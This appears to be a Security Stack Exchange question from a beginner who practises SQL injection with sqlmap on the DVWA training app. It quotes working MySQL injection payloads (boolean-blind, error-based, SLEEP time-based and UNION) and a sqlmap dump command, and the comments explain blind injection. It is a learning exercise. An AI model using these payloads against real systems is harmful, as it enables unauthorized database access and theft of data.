0

I was trying out SQLMAP on DVWA (medium security for SQL injection), and I did get a set of payloads (sqlmap chucked out a few payloads that should have worked). But entered manually, I couldn't get the payloads to work. If I let sqlmap do the job, then it works. Can anyone tell me why this is so?

sqlmap -r data.txt -p id --dump

Parameter: id (POST)
    Type: boolean-based blind
    Title: Boolean-based blind - Parameter replace (original value)
    Payload: id=(SELECT (CASE WHEN (5617=5617) THEN 2 ELSE (SELECT 4209 UNION SELECT 4715) END))&Submit=Submit

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=2 AND (SELECT 2425 FROM(SELECT COUNT(*),CONCAT(0x71706b6a71,(SELECT (ELT(2425=2425,1))),0x7162707171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)&Submit=Submit

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=2 AND (SELECT 7889 FROM (SELECT(SLEEP(5)))jSfl)&Submit=Submit

    Type: UNION query
    Title: Generic UNION query (NULL) - 2 columns
    Payload: id=2 UNION ALL SELECT NULL,CONCAT(0x71706b6a71,0x45596866446d6f486b5771515972717242497377544549685a437141704441774e504266424d4e56,0x7162707171)-- -&Submit=Submit

What I did: I put each payload for example

-- id=2 UNION ALL SELECT NULL,CONCAT(0x71706b6a71,0x45596866446d6f486b5771515972717242497377544549685a437141704441774e504266424d4e56,0x7162707171)-- -&Submit=Submit --

into the form data on dev tools, and I don't get a response at all.

What I expected: I expected that the database should show up like when you put in ' or '1'='1 into the low security dvwa and you get into the database. I figured that if you put in the payload generated by sqlmap into the form data, and send the request over dev tools that the database should be visible.

What am I missing here?

schroeder
  • 123,438
  • 55
  • 284
  • 319
kellyr
  • 1
  • 1
  • 1
    "It didn't work" doesn't give us much to work with. What actually happens? How are you doing it manually? Whenever asking for troubleshooting help, always in include what works, what doesn't what the output is, and what you expect the output to be. – schroeder Jan 05 '22 at 18:01
  • 1
    Suggestion: use Wireshark to capture traffic, and compare your requests with those generated by SqlMap. – Kate Jan 05 '22 at 19:26
  • 1
    Uh, that query you say that you used? That's for a ***blind injection*** according to sqlmap. You literally won't see anything. Did you try the other queries? "and then you get the database" -- no, that's not how this works. Does anything in that query look like it would return a database? – schroeder Jan 07 '22 at 13:30
  • But it's a payload isn't it? When sqlmap finds those payloads, it then asks "do you want to inject them", and we say yes, and it chucks out the database. How come? Sorry if this sounds a little stupid, but im new – kellyr Jan 08 '22 at 17:08
  • 2
    @kellyr It sounds like you need to learn what blind injection is. This is also why I *highly recommend* **not** to start with automated tools like SQLmap, as you don't learn anything and have the tool do all the work for you. –  Jan 08 '22 at 17:09
  • Those are proof of concept payloads that result in success. They are not magic "dump the database" strings. Use those payloads well, and know how to manipulate them, and you can copy what sqlmap does. I ***highly*** suggest that you run sqlmap in highly verbose mode to see how SQLmap uses its payloads. – schroeder Jan 09 '22 at 01:15
  • Ok, i will run it in highly verbose mode. thanks – kellyr Jan 09 '22 at 18:03

0 Answers0